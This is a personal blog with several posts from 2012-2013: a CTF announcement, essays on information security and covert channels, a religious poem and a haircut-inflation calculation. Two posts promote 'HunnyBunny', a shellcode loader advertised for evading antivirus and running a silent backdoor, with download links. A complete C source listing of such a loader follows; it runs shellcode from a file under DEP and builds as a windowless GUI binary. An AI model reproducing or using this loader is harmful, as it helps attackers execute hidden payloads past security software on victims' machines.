Friday, February 22, 2013

IHack 2013 13-14 April. Ready t0 0wned?




It's 2013 and the Mayan prediction failed again. But we know that in a competition, winner = awesome, loser = sucks.


Once again, we are proud to be the community selected for the UiTM IHACK 2013. There are two categories:

1. Attack and Defense style (headache mode)

2. Forensics (Jeopardy mode)


If you are an IPT (higher-education) student without much cash, here is a good chance to grab some bucks and fame. Average inflation in this country runs at a minimum of 5% a year, so you had better get used to having money.

Hints and tips:

1. The usual network keys.
2. Enter the VM world (we have plenty of them).
3. If you know a function as a special subroutine with local variables and a return value, you might get the kick.
4. Think outside the box.




Sunday, February 10, 2013

Hiding the Wolf inside a sheep.

If you followed my previous post, you will have seen that running HunnyBunny, even from a shortcut, creates something like this:


A command prompt. We do not like a command prompt, since it defeats the purpose of a silent backdoor.

On Linux we can easily background a process by appending & to the command. On Windows there is no such thing: a console-subsystem executable is given a console window before main() even runs.

How can we background a backdoor process in this case?
Simple: by treating our console application as a Windows (GUI) application.
So we include the necessary Windows header file to build a GUI app, declare the window procedure, and hide the window:
/* mark the window invisible (0 is SW_HIDE) */
  ShowWindow (hwnd, SW_HIDE);

Put our original code in the main function and we are good to go.

One caveat: what actually stops the console from appearing is linking the program as a GUI-subsystem executable (a WinMain entry point, built with /SUBSYSTEM:WINDOWS or MinGW's -mwindows). Hiding a window with ShowWindow() in a binary that is still linked as a console program only makes the console flash briefly before it disappears.


Download: http://www.sendspace.com/file/by8b01



HunnyBunny: Execute any shellcode on the




The philosophy of a gun.

A gun is dangerous if there is a bullet inside it.
A bullet is dangerous if it were shot from a gun.

Thus if we manage to separate the gun from the bullet, both appear harmless, although their nature is somewhat violent.

HunnyBunny follows the philosophy of a gun. It is a platform for executing raw shellcode read from a file: the loader carries no payload of its own, so by itself it has nothing for a signature to match. You can use HunnyBunny to

- Evade antivirus (most of them)
- Test shellcode functionality (does it work properly or not)
- Execute alphanumeric shellcode with ease
- Run with DEP/NX enabled, since the loader places the bytes in memory it has explicitly marked executable

Download the binary and instruction slides:

http://www.sendspace.com/file/kijzpf

Video tutorial:








It is similar to http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html
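As an added example, written for this page and not HunnyBunny's own code (whose source is not reproduced here), the two posts above combined into one program: a loader that reads raw shellcode bytes from a file, makes the memory executable explicitly so that the bytes run with DEP/NX enabled, and on Windows is built as a GUI-subsystem program so that no console window ever appears. The six-byte payload (mov eax, 42 ; ret) is constructed for testing and assumes an x86 or x86-64 host; the file name, function names and exit codes are this example's own choices.

```c
#define _GNU_SOURCE                    /* MAP_ANONYMOUS on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Constructed test payload for x86/x86-64:  mov eax, 42 ; ret */
static const unsigned char demo_ret42[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };

#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
#define HOST_IS_X86 1
#else
#define HOST_IS_X86 0
#endif
int host_is_x86(void) { return HOST_IS_X86; }   /* demo_ret42 is only valid on x86 */

/* Copy the bytes into fresh RW memory, then flip the page to RX. Explicitly asking
 * for execute permission is what makes the loader work with DEP/NX on: NX only stops
 * code on pages never marked executable. NULL if the OS or a sandbox refuses. */
static void *make_executable(const unsigned char *code, size_t len)
{
#ifdef _WIN32
    DWORD old;
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) return NULL;
    memcpy(mem, code, len);
    if (VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old)) return mem;
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
    memcpy(mem, code, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) == 0) return mem;
    munmap(mem, len);
#endif
    return NULL;
}

/* Call the bytes as `int fn(void)`; -2 means executable memory was refused. */
int run_shellcode(const unsigned char *code, size_t len)
{
    int (*fn)(void); int rc;
    void *mem = make_executable(code, len);
    if (!mem) return -2;
    memcpy(&fn, &mem, sizeof fn);      /* object -> function pointer without a cast warning */
    rc = fn();
#ifdef _WIN32
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    munmap(mem, len);
#endif
    return rc;
}

/* Slurp a whole file into a malloc'd buffer; returns its length, or 0 on failure. */
size_t read_file(const char *path, unsigned char **out)
{
    FILE *f = fopen(path, "rb");
    long n = 0; size_t got = 0;
    *out = NULL;
    if (!f) return 0;
    if (fseek(f, 0, SEEK_END) == 0 && (n = ftell(f)) > 0 && (*out = malloc((size_t)n)) != NULL) {
        rewind(f);
        got = fread(*out, 1, (size_t)n, f);
    }
    fclose(f);
    if (got == 0 || got != (size_t)n) { free(*out); *out = NULL; return 0; }
    return got;
}

/* Shared body of the two entry points below:  loader <shellcode-file> */
static int loader_main(int argc, char **argv)
{
    unsigned char *buf; size_t n; int rc;
    if (argc < 2) { fprintf(stderr, "usage: %s shellcode.bin\n", argv[0]); return 2; }
    if ((n = read_file(argv[1], &buf)) == 0) { fprintf(stderr, "cannot read %s\n", argv[1]); return 2; }
    rc = run_shellcode(buf, n);
    free(buf);
    return rc;
}

#ifdef _WIN32
/* Link with -mwindows (MinGW) or /SUBSYSTEM:WINDOWS (MSVC): a GUI-subsystem binary
 * is never given a console, so nothing flashes on screen. This is the "wolf inside
 * a sheep" trick done at link time rather than by hiding a window afterwards. */
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
    (void)hInst; (void)hPrev; (void)lpCmd; (void)nShow;
    return loader_main(__argc, __argv);    /* argc/argv as parsed by the CRT */
}
#else
int main(int argc, char **argv) { return loader_main(argc, argv); }
#endif
```

Build on Linux with cc -o loader loader.c, on MinGW with gcc -mwindows -o loader.exe loader.c, then run loader payload.bin; the process exits with whatever the payload leaves in eax. Allocating RW first and switching to RX keeps the loader working under DEP while never holding a writable-and-executable page; a return of -2 means the host refused to hand out executable memory at all (a process with dynamic code disabled, or a locked-down sandbox), which is the one control this kind of loader cannot get around.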

Sunday, January 20, 2013

Purifying Security

The IT industry in Malaysia has generally been flooded with impurities. It is generally acceptable to be vendor-biased, product-biased, framework-biased and so on; otherwise the whole industry would black out, since everyone has to choose a side (open versus closed, open cooperating with closed, aligned with the government or not). But information still needs to be secured.

The term IT derives from two root words in English:

1. Information
2. Technology

Note that the word "computer" appears nowhere in the term itself. Information technology is, however, widely defined as the medium, or spectrum of media, through which knowledge and records are stored.

Historically, we know that information was passed from generation to generation by oral recitation; that is a known fact of human history. It took mankind millennia to come up with writing symbols and standards.

Why did this happen? When information is transmitted orally its integrity can be altered, because humans tend to forget. To preserve knowledge, its transmission moved to textual, written form. The existence of writing does not change the fact that oral transmission is also a form of information transmission.


Mankind has now entered a new millennium in which knowledge can be preserved digitally. But we were late to realise that once data is turned into bits and bytes, every element of the digital world can be compromised and badly corrupted.

In the old world, a signature or a seal indicated the originality and integrity of a document. Some may argue that this was full of flaws, but the digital world does not help much at all: abuse of so-called "trusted" digital certificates happens everywhere. Worse, digital forensics sometimes cannot get to the truth about an incident. A palaeontologist can estimate the age of a dinosaur bone, but a digital forensic investigator may not be able to tell when an intrusion occurred if the logs have been altered.

Thus we live in a dangerous age, in which information is thrown at us without limit. There is no single effective method for separating useful information from junk on the Internet (there is none, actually). Truth, lies, deception and scandalous news are thrown in our faces (literally, since you are reading this via Blogspot or Facebook). This creates a lot of partisanship in the history of mankind. Worst of all, the one actually winning is the corporation, not the community behind it. This matters because a corporation is not bothered by moral obligation (moral != law); shaming or humiliating an individual, with or without proof, does not matter to it. What matters is keeping you entertained until you drop dead. But that is not the kind of death we are seeking, right?

So, from my point of view, the ideal of network security is not getting rid of the viruses on your thumb drive but preserving information so that it is protected in the CIA sense:

C = Confidentiality,
I  = Integrity,
A = Availability.

Unfortunately many people do not get the idea. For them, security means buying a bunch of tools and setting up some sort of deception sensor, without realising that what most needs protecting is left unprotected...
And thus the tribulation age of security descends upon us.

Wednesday, January 2, 2013

Fitna of the World

The World ,

The fitnah has unsheathed itself on this Ummah,
Oh how difficult it is to be seen as good in the eyes of people nowadays,
When a kid died after hijacking his sister's car,
We blame the police, we blame the authorities,
Yet nobody said anything about the family,
Why let a mere child wander around outside in the middle of the night?
Our great fuqaha in their youth woke up in the middle of the night to perform prayers,
Be it from their own self-interest or from the scolding of their mothers,
Yet our youth today spend the night dancing, eating and smoking and feel as if they will live forever,
If only they knew how short and ugly the reality of this world is

Oh, the one with a family,
What is the welfare of your family?
We talk about injustice, but did we do justice to our family?
Our Master Sayyidul Muhammad s.a.w. told us
The best of you are those who are best to their families
and I am the best of you to my family

Singers were idolized,
Lyrics were memorized,
But only the Hafizun have the privilege to pull us from hellfire.

Praise Allah, the Lord of Lords,
King of all Kings,
The Only One, Almighty,
Yet people are asking His followers: can we use
His Holy Name in our religious book?
Masha-Allah,
How can the ummah accept it, thinking, hey, it's all right,
When the non-followers put Allah and His 99 Glorious Names in an unaccepted place?

When the skies almost crack
And the Earth almost shatters
When someone says our Lord has a son...
But the humans remain ignorant.


It's true Allah Azzawajalla's Name has no trademark or copyright,
He needs no patent, nor lawyer, nor anything else,
Since everything is HIS and we are here because of HIS MERCY
Kunfayakun
And things cease to exist
Kunfayakun
And logic breaks down..

Saturday, September 29, 2012

Budget Gunting Rambut (Haircut Budget)

Budget, bonus, sugar, handphones, aid, the poor, billion, trillion, gazillion, free education bla bla, fuel subsidy bla bla, etc.

What do you get when you compare the BN budget and the PR budget?
Answer: it's the same whichever road you choose, give or take.


From the PPP of our GDP, based on IndexMundi:
http://www.indexmundi.com/malaysia/gdp_(purchasing_power_parity).html


The hidden law of economics is that everything is computable if you eliminate unnecessary human feelings toward any party. If it can be computed, there is a law that can be followed.


We have seen purchasing power parity grow steadily at roughly 5% per year. There is a small dip in 1999-2000 due to the depression of that period, but otherwise there is growth every year. Now some people say our PPP increased thanks to BN, Dr. M and so on.
But from the law of exponential growth in economics

And for the doubling time, where growth reaches 100% of the initial sample


We can see that it is true: within 14 years growth goes beyond 100%.
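The growth and doubling-time formulas referred to above were images on the original page and are not reproduced here; the following is an added worked derivation, not the author's own formulas. With a constant growth rate $r$ per year and a starting value $P_0$:

$$P(t) = P_0 (1+r)^t, \qquad P(t_2) = 2P_0 \;\Rightarrow\; t_2 = \frac{\ln 2}{\ln(1+r)}$$

$$r = 0.05:\quad t_2 = \frac{0.6931}{0.04879} \approx 14.2\ \text{years}$$

which is the 14 years read off the chart above (the "rule of 70", $70/5 = 14$, is the same number). Applied to the RM10 haircut below with the same 5% rate: $10 \cdot 1.05^t = 15$ gives $t = \ln 1.5 / \ln 1.05 \approx 8.3$ years, and RM30 (one doubling past RM15) takes $\ln 3 / \ln 1.05 \approx 22.5$ years from today.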


What does this statistic tell us? We spend a lot on doing regular things. Forget unhealthy stuff (radiation from electronic devices, high-calorie food); take haircuts, for example.
An average Joe (a decent Malaysian, not one with dyed hair or hair as long as Kage's) spends an average of 15 minutes at a barber shop. Normal hair grows about half an inch per month, so for boys that means a haircut every two months. If you keep cutting your hair as you did in school, by the age of 30 you should have had at least 138 haircuts (starting from the age of 7). Nevertheless the price of a haircut increases exponentially, with the doubling time above.


The current average haircut price in KL is RM10.
Time spent at the barber shop: 15 minutes, constant.

Take note: unless some dystopian event is triggered, by the time Aalim's child is 7 years old, cutting that child's hair will cost roughly RM15, and by the time he enters Form 2, a straight RM30. Bwahaha.

Sources: IndexMundi and some YouTube videos. Don't care about crappy grammar; I'm not a mat salleh (Westerner).










Friday, September 21, 2012

There is no security.

The Scenario

Alice: Hi, I would like to make a booking reservation at your resort today.

Manager: Sure, but you need to send us a copy of the front and back of your credit card to tally it.

Alice: No way!! That's insecure.

Manager: Well, you could use our online booking system. It's encrypted with 2048-bit bla bla...

Alice: Cool, thanks man!!

Manager: No problem. Be sure not to give the details over public wifi, and only use a trusted network when you use our system; can't have people snooping on the traffic, eh.

Taking a classical approach to crypto: when Alice and the Manager want to exchange sensitive information,

what do they do? Use SSL or some other "state of the art" cryptographic transform. So, to simplify the process flow, we say that Alice views the data in unencrypted form, and so does the Manager, from a process-flow point of view.


So, in the Genesis of Covert Channel: in the beginning there is no security, and in the end there is no security. Let us expand the diagram to cover what lies outside the process flow.



Here the Reality Domain consists of the physical interactions and environment that Alice and the Manager encounter, whether with living beings or non-living things, while the Logical Domain is the list of applications they use to view the insecure (unencrypted) form of the data.

Suppose Alice is the owner of a credit or debit card. One way or another, the Reality Domain entities Alice may encounter are:

- Cashier
- Receptionist 
- Friends
- Family


while the Logical Domain can be narrowed down to three entities:

- Web Browser
- Email
- PDF output or PostScript dump for printing or archiving

For the Manager, the Reality Domain entities encountered are:

- Finance
- Clerk
- Auditor
- External booking Information

while the Logical Domain can be narrowed down to three entities:


- Software for viewing customer data (probably Excel or a PDF form)
- Email
- PDF output or PostScript dump for printing or archiving


Notice that none of the interactions in the reality domain or the logical domain has any form of security at all.

What is the implication? Suppose the Manager says to Finance: "we received this booking from Alice, here are her details, please process and proceed with the payment." The instruction and the information are passed around in insecure form, whether electronically (email) or verbally.

We spend tremendous amounts of money securing the process flow under a multitude of compliance regimes, yet we often forget what happens in the "event before the flow" and the "event after the flow":

  • Have we paid attention to the security of interactions in both domains?
  • What keeps our data safe from each entity in each domain?
  • Can an entity hop to, or mimic, another entity across domains?
In the lore of malware, we know that malware can hijack the processes and threads of other applications under certain circumstances (token privileges, the CreateRemoteThread() API, and so on).

In the lore of scam-ware, we know that a person can impersonate someone else and retrieve data as long as they present the right persona.

In the lore of human brains, 99% of us cannot decrypt DES with a "constant key" in mere seconds, so the data has to be passed to another human in its original form (numbers, names, passwords).

Conclusion:
Security is broken wherever the data can be viewed in an insecure form.
We live in an insecure environment on a thin line of trust.